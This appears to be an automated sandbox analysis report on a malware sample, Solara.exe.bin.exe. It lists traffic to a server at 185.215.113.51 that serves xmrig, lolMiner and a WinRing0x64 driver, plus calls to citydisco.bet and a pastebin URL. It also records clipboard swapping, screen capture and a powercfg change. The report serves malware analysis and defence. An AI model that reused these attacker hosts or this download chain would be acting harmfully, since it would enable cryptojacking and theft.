Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51

Source: global traffic	HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic	HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: citydisco.bet
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: unknown

HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: citydisco.bet

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 920414978f665e6c-EWR

Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51
Source: Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WatchDog.exe
Source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.dr	String found in binary or memory: http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.00000000032A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WatchDog.exeP
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WinRing0x64.sys
Source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.dr	String found in binary or memory: http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.00000000032A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WinRing0x64.sysP
Source: Solara.exe.bin.exe, 00000002.00000003.1636763357.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636978745.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2171791456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2170565679.0000000000BAA000.00000004.00000010.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636824557.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172359493.00000000011F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exe
Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636978745.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exe#
Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636978745.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exe&
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/lolMiner.exe
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/xmrig.exe
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/xmrig.exeP
Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51:80/conhost.exe$
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.00000000032A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51D
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000335A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.8.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 00000015.00000002.2175338352.000001B3D1C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: qmgr.db.21.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.21.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.21.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.21.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.21.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.21.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.21.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.comd
Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1070884478.00000000079FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1065158096.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1070884478.00000000079FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Solara.exe.bin.exe, 00000002.00000003.956611569.0000000003616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 0000000B.00000002.1065158096.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBLr
Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Solara.exe.bin.exe, 00000002.00000003.996726708.0000000001221000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/
Source: Solara.exe.bin.exe, 00000002.00000003.974203654.0000000001221000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017955007.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017854768.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.974473104.000000000123F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996006601.0000000001221000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.974386344.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996726708.0000000001221000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/02
Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/f3
Source: Solara.exe.bin.exe, 00000002.00000003.996726708.000000000124E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS
Source: Solara.exe.bin.exe, 00000002.00000003.956119980.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISdtzYrvZ
Source: Solara.exe.bin.exe, 00000002.00000003.968762144.000000000125D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISjkJvr
Source: Solara.exe.bin.exe, 00000002.00000003.933316284.000000000127E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.944716041.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISre
Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: Solara.exe.bin.exe, 00000002.00000002.2172658173.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017955007.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1017854768.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996006601.0000000001221000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.996726708.0000000001221000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJISNz
Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.21.dr, qmgr.db.21.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000015.00000003.1204211365.000001B3D1A00000.00000004.00000800.00020000.00000000.sdmp, edb.log.21.dr, qmgr.db.21.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 0000000B.00000002.1065158096.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1070884478.00000000079FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.1065158096.00000000059A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1065158096.0000000005BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 0000000B.00000002.1067664325.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.000000000328D000.00000004.00000800.00020000.00000000.sdmp, logs.uce1.8.dr, logs.uce.8.dr, logs.uce0.8.dr	String found in binary or memory: https://pastebin.com/raw/YpJeSRBC
Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: Solara.exe.bin.exe, 00000002.00000003.932770948.0000000003608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Solara.exe.bin.exe, 00000002.00000003.958129614.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: Solara.exe.bin.exe, 00000002.00000003.957678616.0000000003612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Solara.exe.bin.exe, 00000002.00000003.957776474.00000000039EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49695 version: TLS 1.2

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043E5B0

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 2_2_03451000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03451000

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043E5B0

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 2_2_0043F276 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_0043F276

System Summary

Uses powercfg.exe to modify the power settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

File created: C:\ProgramData\Dllhost\WinRing0x64.sys

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_00916460	0_2_00916460
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008D553B	0_2_008D553B
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_00914CB0	0_2_00914CB0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008F1F50	0_2_008F1F50
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_00916090	0_2_00916090
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0092E0F0	0_2_0092E0F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_009290F0	0_2_009290F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0093B0F0	0_2_0093B0F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008E50E0	0_2_008E50E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008F00E0	0_2_008F00E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008EA0F0	0_2_008EA0F0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_00926010	0_2_00926010
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008D1000	0_2_008D1000
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0093A030	0_2_0093A030
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008FE020	0_2_008FE020
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008DE030	0_2_008DE030
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0092C050	0_2_0092C050
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0090D070	0_2_0090D070
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0092D070	0_2_0092D070
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008EF190	0_2_008EF190
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008E01A0	0_2_008E01A0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_009341D0	0_2_009341D0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_008D41D0	0_2_008D41D0
